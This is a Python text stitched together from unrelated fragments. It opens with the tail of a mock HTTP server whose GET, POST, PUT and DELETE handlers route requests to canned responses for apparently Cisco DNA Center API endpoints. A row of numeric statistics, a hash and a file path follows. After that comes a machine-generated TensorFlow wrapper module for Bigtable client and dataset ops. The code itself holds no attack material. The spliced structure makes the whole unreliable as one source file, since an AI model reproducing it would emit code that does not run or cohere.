        (self.matches_DEVICES_f6826a8e41bba242, self.devices_getwirelesslancontrollerdetailsby_id_response),
        (self.matches_DEVICES_b888792d43baba46, self.devices_get_interfaceby_id_response),
        (self.matches_DEVICES_c3b3c9ef4e6b8a09, self.devices_get_functional_capabilityfordevices_response),
        (self.matches_DEVICES_89b2fb144f5bb09b, self.devices_get_device_detail_response),
        (self.matches_DEVICES_f49548c54be8a3e2, self.devices_get_network_devicebypaginationrange_response),
        (self.matches_DEVICES_ffa748cc44e9a437, self.devices_retrievesallnetworkdevices_response),
        (self.matches_SITES_17a82ac94cf99ab0, self.sites_get_site_health_response),
        (self.matches_SITES_209509d247599e19, self.sites_get_site_response),
        (self.matches_SITES_d9bdb9034df99dba, self.sites_get_site_count_response),
        (self.matches_SITES_eba669054e08a60e, self.sites_get_membership_response),
        (self.matches_NETWORKS_6284db4649aa8d31, self.networks_get_vlandetails_response),
        (self.matches_NETWORKS_9ba14a9e441b8a60, self.networks_get_site_topology_response),
        (self.matches_NETWORKS_b2b8cb91459aa58f, self.networks_get_physical_topology_response),
        (self.matches_NETWORKS_b9b48ac8463a8aba, self.networks_gettopologydetails_response),
        (self.matches_NETWORKS_c2b5fb764d888375, self.networks_get_l3_topology_details_response),
        (self.matches_NETWORKS_ca91da84401abba1, self.networks_get_overall_network_health_response),
        (self.matches_CLIENTS_149aa93b4ddb80dd, self.clients_get_overall_client_health_response),
        (self.matches_CLIENTS_e2adba7943bab3e9, self.clients_get_client_detail_response),
        (self.matches_PNP_0a9c988445cb91c8, self.pnp_get_sync_resultfor_virtual_account_response),
        (self.matches_PNP_3cb24acb486b89d2, self.pnp_get_smart_account_list_response),
        (self.matches_PNP_7989f86846faaf99, self.pnp_get_workflow_count_response),
        (self.matches_PNP_70a479a6462a9496, self.pnp_get_virtual_account_list_response),
        (self.matches_PNP_7e92f9eb46db8320, self.pnp_get_pnpglobalsettings_response),
        (self.matches_PNP_aeb4dad04a99bbe3, self.pnp_get_workflows_response),
        (self.matches_PNP_bab6c9e5440885cc, self.pnp_get_deviceby_id_response),
        (self.matches_PNP_d9a1fa9c4068b23c, self.pnp_get_device_count_response),
        (self.matches_PNP_80acb88e4ac9ac6d, self.pnp_get_workflowby_id_response),
        (self.matches_PNP_f09319674049a7d4, self.pnp_get_device_history_response),
        (self.matches_PNP_e6b3db8046c99654, self.pnp_get_devicelist_response),
        (self.matches_SWIM_0c8f7a0b49b9aedd, self.swim_getsoftwareimagedetails_response),
        (self.matches_SITE_PROFILE_7fbe4b804879baa4, self.site_profile_get_devicedetailsby_ip_response),
    )
    for is_match, send_reply in routes:
        if is_match():
            send_reply()
            return
def do_POST(self):
    """Route a POST request to the mock responder of the first endpoint whose
    pattern matches ``self.path``; unmatched paths fall through unanswered.
    """
    # Ordered (matcher, responder) pairs — first match wins, preserving the
    # original registration order of the mock endpoints.
    routes = (
        (self.matches_AUTHENTICATION_ac8ae94c4e69a09d, self.authentication_authentication_response),
        (self.matches_TEMPLATE_PROGRAMMER_00aec9b1422ab27e, self.template_programmer_create_project_response),
        (self.matches_TEMPLATE_PROGRAMMER_6099da82477b858a, self.template_programmer_deploy_template_response),
        (self.matches_TEMPLATE_PROGRAMMER_62b05b2c40a9b216, self.template_programmer_version_template_response),
        (self.matches_TEMPLATE_PROGRAMMER_f6b119ad4d4aaf16, self.template_programmer_create_template_response),
        (self.matches_TAG_00a2fa6146089317, self.tag_addmemberstothetag_response),
        (self.matches_TAG_1399891c42a8be64, self.tag_create_tag_response),
        (self.matches_NETWORK_DISCOVERY_17929bc7465bb564, self.network_discovery_create_netconfcredentials_response),
        (self.matches_NETWORK_DISCOVERY_4d9ca8e2431a8a24, self.network_discovery_create_httpwritecredentials_response),
        (self.matches_NETWORK_DISCOVERY_55b439dc4239b140, self.network_discovery_startdiscovery_response),
        (self.matches_NETWORK_DISCOVERY_6bacb8d14639bdc7, self.network_discovery_create_snmpwritecommunity_response),
        (self.matches_NETWORK_DISCOVERY_948ea8194348bc0b, self.network_discovery_create_cli_credentials_response),
        (self.matches_NETWORK_DISCOVERY_979688084b7ba60d, self.network_discovery_create_snmpv3credentials_response),
        (self.matches_NETWORK_DISCOVERY_a5ac99774c6bb541, self.network_discovery_create_update_snmpproperties_response),
        (self.matches_NETWORK_DISCOVERY_bf859ac64a0ba19c, self.network_discovery_create_httpreadcredentials_response),
        (self.matches_NETWORK_DISCOVERY_7aa3da9d4e098ef2, self.network_discovery_create_snmpreadcommunity_response),
        (self.matches_COMMAND_RUNNER_d6b8ca774739adf4, self.command_runner_runread_onlycommandsondevices_response),
        (self.matches_PATH_TRACE_a395fae644ca899c, self.path_trace_initiateanew_pathtrace_response),
        (self.matches_NON_FABRIC_WIRELESS_07913b7f4e1880de, self.non_fabric_wireless_provision_response),
        (self.matches_NON_FABRIC_WIRELESS_47ba59204e0ab742, self.non_fabric_wireless_create_wireless_profile_response),
        (self.matches_NON_FABRIC_WIRELESS_db9f997f4e59aec1, self.non_fabric_wireless_createand_provision_ssid_response),
        (self.matches_NON_FABRIC_WIRELESS_8a96fb954d09a349, self.non_fabric_wireless_create_enterprise_ssid_response),
        (self.matches_FABRIC_WIRED_a4b56a5f478a97dd, self.fabric_wired_addsborderdevicein_sda_fabric_response),
        (self.matches_DEVICES_4bb22af046fa8f08, self.devices_add_device_response),
        (self.matches_DEVICES_cd98780f4888a66d, self.devices_export_devicelist_response),
        (self.matches_SITES_23896b124bd8b9bf, self.sites_create_site_response),
        (self.matches_SITES_eeb168eb41988e07, self.sites_assign_device_to_site_response),
        (self.matches_PNP_0b836b7b4b6a9fd5, self.pnp_un_claim_device_response),
        (self.matches_PNP_1e962af345b8b59f, self.pnp_add_virtual_account_response),
        (self.matches_PNP_21a6db2540298f55, self.pnp_import_devicesinbulk_response),
        (self.matches_PNP_5889fb844939a13b, self.pnp_claima_devicetoa_site_response),
        (self.matches_PNP_848b5a7b4f9b8c12, self.pnp_adda_workflow_response),
        (self.matches_PNP_a4b6c87a4ffb9efa, self.pnp_sync_virtual_account_devices_response),
        (self.matches_PNP_9e857b5a4a0bbcdb, self.pnp_reset_device_response),
        (self.matches_PNP_cf9418234d9ab37e, self.pnp_preview_config_response),
        (self.matches_PNP_f3b26b5544cabab9, self.pnp_add_device_response),
        (self.matches_PNP_d8a619974a8a8c48, self.pnp_claim_device_response),
        (self.matches_SWIM_8cb6783b4faba1f4, self.swim_triggersoftwareimagedistribution_response),
        (self.matches_SWIM_4dbe3bc743a891bc, self.swim_importlocalsoftwareimage_response),
        (self.matches_SWIM_fb9beb664f2aba4c, self.swim_triggersoftwareimageactivation_response),
        (self.matches_SWIM_bc8aab4746ca883d, self.swim_importsoftwareimagevia_url_response),
        (self.matches_SITE_PROFILE_828828f44f28bd0d, self.site_profile_provision_nfv_response),
        (self.matches_SITE_PROFILE_2f97e8fa45f8b2a3, self.site_profile_nfv_provisioning_detail_response),
    )
    for is_match, send_reply in routes:
        if is_match():
            send_reply()
            return
def do_PUT(self):
    """Serve an incoming PUT request.

    Walks the registered (matcher, responder) pairs in order and hands the
    request to the responder of the first matcher that accepts it.  If no
    matcher accepts, the method simply returns without writing a response,
    exactly like falling off the end of the original if-chain.
    """
    # Order matters: matchers are probed first-to-last, and only until
    # one accepts, mirroring the original early-return dispatch.
    dispatch_table = (
        (self.matches_TEMPLATE_PROGRAMMER_7781fa0548a98342,
         self.template_programmer_update_template_response),
        (self.matches_TEMPLATE_PROGRAMMER_9480fa1f47ca9254,
         self.template_programmer_update_project_response),
        (self.matches_TEMPLATE_PROGRAMMER_f393abe84989bb48,
         self.template_programmer_preview_template_response),
        (self.matches_TAG_45bc7a8344a8bc1e,
         self.tag_updatestagmembership_response),
        (self.matches_TAG_4d86a993469a9da9,
         self.tag_update_tag_response),
        (self.matches_NETWORK_DISCOVERY_10b06a6a4f7bb3cb,
         self.network_discovery_update_snmpwritecommunity_response),
        (self.matches_NETWORK_DISCOVERY_1da5ebdd434aacfe,
         self.network_discovery_update_snmpv3credentials_response),
        (self.matches_NETWORK_DISCOVERY_47a1b84b4e1b8044,
         self.network_discovery_update_snmpreadcommunity_response),
        (self.matches_NETWORK_DISCOVERY_89b36b4649999d81,
         self.network_discovery_update_httpreadcredential_response),
        (self.matches_NETWORK_DISCOVERY_9788b8fc4418831d,
         self.network_discovery_updatesdiscoveryby_id_response),
        (self.matches_NETWORK_DISCOVERY_b68a6bd8473a9a25,
         self.network_discovery_update_httpwritecredentials_response),
        (self.matches_NETWORK_DISCOVERY_fba0d80747eb82e8,
         self.network_discovery_update_cli_credentials_response),
        (self.matches_NETWORK_DISCOVERY_c5acd9fa4c1a8abc,
         self.network_discovery_update_netconfcredentials_response),
        (self.matches_NETWORK_DISCOVERY_709fda3c42b8877a,
         self.network_discovery_updateglobalcredentials_response),
        (self.matches_NON_FABRIC_WIRELESS_20872aec43b9bf50,
         self.non_fabric_wireless_update_wireless_profile_response),
        (self.matches_NON_FABRIC_WIRELESS_a0be3a2f47ab9f3c,
         self.non_fabric_wireless_update_provision_response),
        (self.matches_DEVICES_3b9ef9674429be4c,
         self.devices_sync_devicesusingforce_sync_response),
        (self.matches_DEVICES_b9855ad54ae98156,
         self.devices_update_devicerole_response),
        (self.matches_DEVICES_aeb9eb67460b92df,
         self.devices_sync_devices_response),
        (self.matches_SITES_33aab9b842388023,
         self.sites_update_site_response),
        (self.matches_PNP_09b0f9ce4239ae10,
         self.pnp_update_device_response),
        (self.matches_PNP_3086c9624f498b85,
         self.pnp_update_workflow_response),
        (self.matches_PNP_6f9819e84178870c,
         self.pnp_update_pnp_server_profile_response),
        (self.matches_PNP_8da0391947088a5a,
         self.pnp_update_pnpglobalsettings_response),
    )
    for request_matches, send_mock_response in dispatch_table:
        if request_matches():
            send_mock_response()
            return
def do_DELETE(self):
    """Serve an incoming DELETE request.

    Probes the registered (matcher, responder) pairs in declaration order
    and lets the first accepting matcher's responder handle the request.
    Requests matched by no entry fall through with no response written,
    matching the original if-chain's behaviour.
    """
    # First-to-last probing preserves the precedence of the original chain.
    dispatch_table = (
        (self.matches_TEMPLATE_PROGRAMMER_a7b42836408a8e74,
         self.template_programmer_delete_template_response),
        (self.matches_TEMPLATE_PROGRAMMER_d0a1abfa435b841d,
         self.template_programmer_delete_project_response),
        (self.matches_TAG_429c28154bdaa13d,
         self.tag_delete_tag_response),
        (self.matches_TAG_caa3ea704d78b37e,
         self.tag_remove_tagmember_response),
        (self.matches_NETWORK_DISCOVERY_4c8cab5f435a80f4,
         self.network_discovery_deletediscoveryby_id_response),
        (self.matches_NETWORK_DISCOVERY_c1ba9a424c08a01b,
         self.network_discovery_deletediscoverybyspecifiedrange_response),
        (self.matches_NETWORK_DISCOVERY_db8e09234a988bab,
         self.network_discovery_deletealldiscovery_response),
        (self.matches_NETWORK_DISCOVERY_f5ac590c4ca9975a,
         self.network_discovery_deleteglobalcredentialsby_id_response),
        (self.matches_PATH_TRACE_8a9d2b76443b914e,
         self.path_trace_deletes_pathtraceby_id_response),
        (self.matches_NON_FABRIC_WIRELESS_ae86a8c14b5980b7,
         self.non_fabric_wireless_delete_wireless_profile_response),
        (self.matches_NON_FABRIC_WIRELESS_c7a6592b4b98a369,
         self.non_fabric_wireless_delete_enterprise_ssid_response),
        (self.matches_NON_FABRIC_WIRELESS_cca098344a489dfa,
         self.non_fabric_wireless_deleteandprovision_ssid_response),
        (self.matches_FABRIC_WIRED_1e80bb50430b8634,
         self.fabric_wired_deletesborderdevicefrom_sda_fabric_response),
        (self.matches_DEVICES_1c894b5848eab214,
         self.devices_delete_deviceby_id_response),
        (self.matches_SITES_92acda91406aa050,
         self.sites_delete_site_response),
        (self.matches_PNP_2499e9ad42e8ae5b,
         self.pnp_deregister_virtual_account_response),
        (self.matches_PNP_af8d7b0e470b8ae2,
         self.pnp_delete_workflow_by_id_response),
        (self.matches_PNP_cdab9b474899ae06,
         self.pnp_delete_deviceby_idfrom_pnp_response),
    )
    for request_matches, send_mock_response in dispatch_table:
        if request_matches():
            send_mock_response()
            return
| 62.547421 | 14,472 | 0.663137 | 24,773 | 248,626 | 6.489323 | 0.051831 | 0.036949 | 0.017915 | 0.019035 | 0.866341 | 0.827103 | 0.770975 | 0.725411 | 0.704989 | 0.696299 | 0 | 0.042367 | 0.178055 | 248,626 | 3,974 | 14,473 | 62.563161 | 0.744296 | 0.050675 | 0 | 0.544479 | 0 | 0.000346 | 0.342929 | 0.053608 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125995 | false | 0.003808 | 0.005192 | 0.062305 | 0.380755 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4811b614e5347bd18028d7b895042571a5ab0475 | 31,706 | py | Python | rcnn/lib/python3.6/site-packages/tensorflow/contrib/bigtable/ops/gen_bigtable_ops.py | dreamingweaver/making_passportImage | 68f23411780ff82abe934dfae5fc04acb80f2c49 | [
"MIT"
] | 1 | 2019-01-12T13:17:32.000Z | 2019-01-12T13:17:32.000Z | rcnn/lib/python3.6/site-packages/tensorflow/contrib/bigtable/ops/gen_bigtable_ops.py | dreamingweaver/making_passportImage | 68f23411780ff82abe934dfae5fc04acb80f2c49 | [
"MIT"
] | null | null | null | rcnn/lib/python3.6/site-packages/tensorflow/contrib/bigtable/ops/gen_bigtable_ops.py | dreamingweaver/making_passportImage | 68f23411780ff82abe934dfae5fc04acb80f2c49 | [
"MIT"
] | null | null | null | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: bigtable_ops.cc
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.tf_export import tf_export
@tf_export('bigtable_client')
def bigtable_client(project_id, instance_id, connection_pool_size, max_receive_message_size=-1, container="", shared_name="", name=None):
  r"""Create the `BigtableClient` op, yielding a Bigtable client resource handle.

  Machine-generated wrapper (original C++ source: bigtable_ops.cc).  In graph
  mode the op is added through the op-def library; in eager mode a C fast
  path is attempted first, falling back to
  `bigtable_client_eager_fallback`.

  Args:
    project_id: A `string`.
    instance_id: A `string`.
    connection_pool_size: An `int`.
    max_receive_message_size: An optional `int`. Defaults to `-1`.
    container: An optional `string`. Defaults to `""`.
    shared_name: An optional `string`. Defaults to `""`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `resource`.
  """
  _ctx = _context._context
  if _ctx is None or not _ctx._eager_context.is_eager:
    # Graph mode: normalize attr values, then build the op node.
    project_id = _execute.make_str(project_id, "project_id")
    instance_id = _execute.make_str(instance_id, "instance_id")
    connection_pool_size = _execute.make_int(connection_pool_size, "connection_pool_size")
    if max_receive_message_size is None:
      max_receive_message_size = -1
    max_receive_message_size = _execute.make_int(max_receive_message_size, "max_receive_message_size")
    if container is None:
      container = ""
    container = _execute.make_str(container, "container")
    if shared_name is None:
      shared_name = ""
    shared_name = _execute.make_str(shared_name, "shared_name")
    _, _, _op = _op_def_lib._apply_op_helper(
        "BigtableClient", project_id=project_id, instance_id=instance_id,
        connection_pool_size=connection_pool_size,
        max_receive_message_size=max_receive_message_size,
        container=container, shared_name=shared_name, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = ("project_id", _op.get_attr("project_id"), "instance_id",
              _op.get_attr("instance_id"), "connection_pool_size",
              _op.get_attr("connection_pool_size"),
              "max_receive_message_size",
              _op.get_attr("max_receive_message_size"), "container",
              _op.get_attr("container"), "shared_name",
              _op.get_attr("shared_name"))
    _execute.record_gradient(
      "BigtableClient", _inputs_flat, _attrs, _result, name)
    _result, = _result
    return _result
  else:
    try:
      # Eager mode: try the C fast path first; attr names and values are
      # interleaved positionally, so this ordering must not change.
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._eager_context.device_name,
        "BigtableClient", name, _ctx._post_execution_callbacks, "project_id",
        project_id, "instance_id", instance_id, "connection_pool_size",
        connection_pool_size, "max_receive_message_size",
        max_receive_message_size, "container", container, "shared_name",
        shared_name)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; use the Python slow path.
      return bigtable_client_eager_fallback(
          project_id=project_id, instance_id=instance_id,
          connection_pool_size=connection_pool_size,
          max_receive_message_size=max_receive_message_size,
          container=container, shared_name=shared_name, name=name, ctx=_ctx)
    except _core._NotOkStatusException as e:
      # Append the op name to the message and re-raise without chaining.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)


def bigtable_client_eager_fallback(project_id, instance_id, connection_pool_size, max_receive_message_size=-1, container="", shared_name="", name=None, ctx=None):
  r"""Slow-path eager-mode implementation of `bigtable_client`."""
  _ctx = ctx if ctx else _context.context()
  project_id = _execute.make_str(project_id, "project_id")
  instance_id = _execute.make_str(instance_id, "instance_id")
  connection_pool_size = _execute.make_int(connection_pool_size, "connection_pool_size")
  if max_receive_message_size is None:
    max_receive_message_size = -1
  max_receive_message_size = _execute.make_int(max_receive_message_size, "max_receive_message_size")
  if container is None:
    container = ""
  container = _execute.make_str(container, "container")
  if shared_name is None:
    shared_name = ""
  shared_name = _execute.make_str(shared_name, "shared_name")
  _inputs_flat = []
  _attrs = ("project_id", project_id, "instance_id", instance_id,
  "connection_pool_size", connection_pool_size, "max_receive_message_size",
  max_receive_message_size, "container", container, "shared_name",
  shared_name)
  _result = _execute.execute(b"BigtableClient", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "BigtableClient", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result

# No Python-level shape function is registered for this op.
_ops.RegisterShape("BigtableClient")(None)
@tf_export('bigtable_lookup_dataset')
def bigtable_lookup_dataset(keys_dataset, table, column_families, columns, name=None):
  r"""Create the `BigtableLookupDataset` op.

  Machine-generated wrapper (original C++ source: bigtable_ops.cc).  In graph
  mode the op is added through the op-def library; in eager mode a C fast
  path is attempted first, falling back to
  `bigtable_lookup_dataset_eager_fallback`.

  Args:
    keys_dataset: A `Tensor` of type `variant`.
    table: A `Tensor` of type `resource`.
    column_families: A `Tensor` of type `string`.
    columns: A `Tensor` of type `string`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context
  if _ctx is None or not _ctx._eager_context.is_eager:
    # Graph mode: build the op node; this op has no attrs to record.
    _, _, _op = _op_def_lib._apply_op_helper(
        "BigtableLookupDataset", keys_dataset=keys_dataset, table=table,
        column_families=column_families, columns=columns, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = None
    _execute.record_gradient(
      "BigtableLookupDataset", _inputs_flat, _attrs, _result, name)
    _result, = _result
    return _result
  else:
    try:
      # Eager mode: try the C fast path first.
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._eager_context.device_name,
        "BigtableLookupDataset", name, _ctx._post_execution_callbacks,
        keys_dataset, table, column_families, columns)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; use the Python slow path.
      return bigtable_lookup_dataset_eager_fallback(
          keys_dataset, table, column_families, columns, name=name, ctx=_ctx)
    except _core._NotOkStatusException as e:
      # Append the op name to the message and re-raise without chaining.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)


def bigtable_lookup_dataset_eager_fallback(keys_dataset, table, column_families, columns, name=None, ctx=None):
  r"""Slow-path eager-mode implementation of `bigtable_lookup_dataset`."""
  _ctx = ctx if ctx else _context.context()
  keys_dataset = _ops.convert_to_tensor(keys_dataset, _dtypes.variant)
  table = _ops.convert_to_tensor(table, _dtypes.resource)
  column_families = _ops.convert_to_tensor(column_families, _dtypes.string)
  columns = _ops.convert_to_tensor(columns, _dtypes.string)
  _inputs_flat = [keys_dataset, table, column_families, columns]
  _attrs = None
  _result = _execute.execute(b"BigtableLookupDataset", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "BigtableLookupDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result

# No Python-level shape function is registered for this op.
_ops.RegisterShape("BigtableLookupDataset")(None)
@tf_export('bigtable_prefix_key_dataset')
def bigtable_prefix_key_dataset(table, prefix, name=None):
  r"""Create the `BigtablePrefixKeyDataset` op.

  Machine-generated wrapper (original C++ source: bigtable_ops.cc).  In graph
  mode the op is added through the op-def library; in eager mode a C fast
  path is attempted first, falling back to
  `bigtable_prefix_key_dataset_eager_fallback`.

  Args:
    table: A `Tensor` of type `resource`.
    prefix: A `Tensor` of type `string`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context
  if _ctx is None or not _ctx._eager_context.is_eager:
    # Graph mode: build the op node; this op has no attrs to record.
    _, _, _op = _op_def_lib._apply_op_helper(
        "BigtablePrefixKeyDataset", table=table, prefix=prefix, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = None
    _execute.record_gradient(
      "BigtablePrefixKeyDataset", _inputs_flat, _attrs, _result, name)
    _result, = _result
    return _result
  else:
    try:
      # Eager mode: try the C fast path first.
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._eager_context.device_name,
        "BigtablePrefixKeyDataset", name, _ctx._post_execution_callbacks,
        table, prefix)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; use the Python slow path.
      return bigtable_prefix_key_dataset_eager_fallback(
          table, prefix, name=name, ctx=_ctx)
    except _core._NotOkStatusException as e:
      # Append the op name to the message and re-raise without chaining.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)


def bigtable_prefix_key_dataset_eager_fallback(table, prefix, name=None, ctx=None):
  r"""Slow-path eager-mode implementation of `bigtable_prefix_key_dataset`."""
  _ctx = ctx if ctx else _context.context()
  table = _ops.convert_to_tensor(table, _dtypes.resource)
  prefix = _ops.convert_to_tensor(prefix, _dtypes.string)
  _inputs_flat = [table, prefix]
  _attrs = None
  _result = _execute.execute(b"BigtablePrefixKeyDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "BigtablePrefixKeyDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result

# No Python-level shape function is registered for this op.
_ops.RegisterShape("BigtablePrefixKeyDataset")(None)
@tf_export('bigtable_range_key_dataset')
def bigtable_range_key_dataset(table, start_key, end_key, name=None):
  r"""Create the `BigtableRangeKeyDataset` op.

  Machine-generated wrapper (original C++ source: bigtable_ops.cc).  In graph
  mode the op is added through the op-def library; in eager mode a C fast
  path is attempted first, falling back to
  `bigtable_range_key_dataset_eager_fallback`.

  Args:
    table: A `Tensor` of type `resource`.
    start_key: A `Tensor` of type `string`.
    end_key: A `Tensor` of type `string`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context
  if _ctx is None or not _ctx._eager_context.is_eager:
    # Graph mode: build the op node; this op has no attrs to record.
    _, _, _op = _op_def_lib._apply_op_helper(
        "BigtableRangeKeyDataset", table=table, start_key=start_key,
        end_key=end_key, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = None
    _execute.record_gradient(
      "BigtableRangeKeyDataset", _inputs_flat, _attrs, _result, name)
    _result, = _result
    return _result
  else:
    try:
      # Eager mode: try the C fast path first.
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._eager_context.device_name,
        "BigtableRangeKeyDataset", name, _ctx._post_execution_callbacks,
        table, start_key, end_key)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; use the Python slow path.
      return bigtable_range_key_dataset_eager_fallback(
          table, start_key, end_key, name=name, ctx=_ctx)
    except _core._NotOkStatusException as e:
      # Append the op name to the message and re-raise without chaining.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)


def bigtable_range_key_dataset_eager_fallback(table, start_key, end_key, name=None, ctx=None):
  r"""Slow-path eager-mode implementation of `bigtable_range_key_dataset`."""
  _ctx = ctx if ctx else _context.context()
  table = _ops.convert_to_tensor(table, _dtypes.resource)
  start_key = _ops.convert_to_tensor(start_key, _dtypes.string)
  end_key = _ops.convert_to_tensor(end_key, _dtypes.string)
  _inputs_flat = [table, start_key, end_key]
  _attrs = None
  _result = _execute.execute(b"BigtableRangeKeyDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "BigtableRangeKeyDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result

# No Python-level shape function is registered for this op.
_ops.RegisterShape("BigtableRangeKeyDataset")(None)
@tf_export('bigtable_sample_key_pairs_dataset')
def bigtable_sample_key_pairs_dataset(table, prefix, start_key, end_key, name=None):
  r"""Create the `BigtableSampleKeyPairsDataset` op.

  Machine-generated wrapper (original C++ source: bigtable_ops.cc).  In graph
  mode the op is added through the op-def library; in eager mode a C fast
  path is attempted first, falling back to
  `bigtable_sample_key_pairs_dataset_eager_fallback`.

  Args:
    table: A `Tensor` of type `resource`.
    prefix: A `Tensor` of type `string`.
    start_key: A `Tensor` of type `string`.
    end_key: A `Tensor` of type `string`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context
  if _ctx is None or not _ctx._eager_context.is_eager:
    # Graph mode: build the op node; this op has no attrs to record.
    _, _, _op = _op_def_lib._apply_op_helper(
        "BigtableSampleKeyPairsDataset", table=table, prefix=prefix,
        start_key=start_key, end_key=end_key, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = None
    _execute.record_gradient(
      "BigtableSampleKeyPairsDataset", _inputs_flat, _attrs, _result, name)
    _result, = _result
    return _result
  else:
    try:
      # Eager mode: try the C fast path first.
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._eager_context.device_name,
        "BigtableSampleKeyPairsDataset", name, _ctx._post_execution_callbacks,
        table, prefix, start_key, end_key)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; use the Python slow path.
      return bigtable_sample_key_pairs_dataset_eager_fallback(
          table, prefix, start_key, end_key, name=name, ctx=_ctx)
    except _core._NotOkStatusException as e:
      # Append the op name to the message and re-raise without chaining.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)


def bigtable_sample_key_pairs_dataset_eager_fallback(table, prefix, start_key, end_key, name=None, ctx=None):
  r"""Slow-path eager-mode implementation of `bigtable_sample_key_pairs_dataset`."""
  _ctx = ctx if ctx else _context.context()
  table = _ops.convert_to_tensor(table, _dtypes.resource)
  prefix = _ops.convert_to_tensor(prefix, _dtypes.string)
  start_key = _ops.convert_to_tensor(start_key, _dtypes.string)
  end_key = _ops.convert_to_tensor(end_key, _dtypes.string)
  _inputs_flat = [table, prefix, start_key, end_key]
  _attrs = None
  _result = _execute.execute(b"BigtableSampleKeyPairsDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "BigtableSampleKeyPairsDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result

# No Python-level shape function is registered for this op.
_ops.RegisterShape("BigtableSampleKeyPairsDataset")(None)
@tf_export('bigtable_sample_keys_dataset')
def bigtable_sample_keys_dataset(table, name=None):
  r"""Create the `BigtableSampleKeysDataset` op.

  Machine-generated wrapper (original C++ source: bigtable_ops.cc).  In graph
  mode the op is added through the op-def library; in eager mode a C fast
  path is attempted first, falling back to
  `bigtable_sample_keys_dataset_eager_fallback`.

  Args:
    table: A `Tensor` of type `resource`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context
  if _ctx is None or not _ctx._eager_context.is_eager:
    # Graph mode: build the op node; this op has no attrs to record.
    _, _, _op = _op_def_lib._apply_op_helper(
        "BigtableSampleKeysDataset", table=table, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = None
    _execute.record_gradient(
      "BigtableSampleKeysDataset", _inputs_flat, _attrs, _result, name)
    _result, = _result
    return _result
  else:
    try:
      # Eager mode: try the C fast path first.
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._eager_context.device_name,
        "BigtableSampleKeysDataset", name, _ctx._post_execution_callbacks,
        table)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; use the Python slow path.
      return bigtable_sample_keys_dataset_eager_fallback(
          table, name=name, ctx=_ctx)
    except _core._NotOkStatusException as e:
      # Append the op name to the message and re-raise without chaining.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)

